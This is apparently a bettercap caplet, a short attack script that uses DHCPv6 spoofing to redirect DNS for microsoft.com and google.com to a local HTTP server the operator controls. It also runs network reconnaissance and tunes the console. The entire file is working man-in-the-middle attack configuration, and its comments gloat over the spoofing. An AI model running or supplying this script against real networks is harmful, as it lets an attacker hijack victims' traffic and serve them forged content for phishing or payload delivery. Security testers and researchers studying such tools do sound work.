# Let's spoof Microsoft and Google ^_^
set dns.spoof.domains microsoft.com,google.com
set dhcp6.spoof.domains microsoft.com,google.com

# Every HTTP request to the spoofed hosts will come to us
# Let's give them some contents
set http.server.path caplets/html

# Check who's alive on the network
net.recon on

# Serve files
http.server on

# Redirect DNS requests by spoofing DHCPv6 packets
dhcp6.spoof on

# Send spoofed DNS replies ^_^
dns.spoof on

# set a custom prompt for ipv6
set $ {by}{fw}{cidr} {reset} {bold}» {reset} {fb}>{env.iface.ipv4}

# clear the events buffer and the screen
# Ignore the most common noisy events:
events.ignore endpoint.new
events.ignore endpoint.lost
events.ignore net.sniff.mdns
events.clear
clear
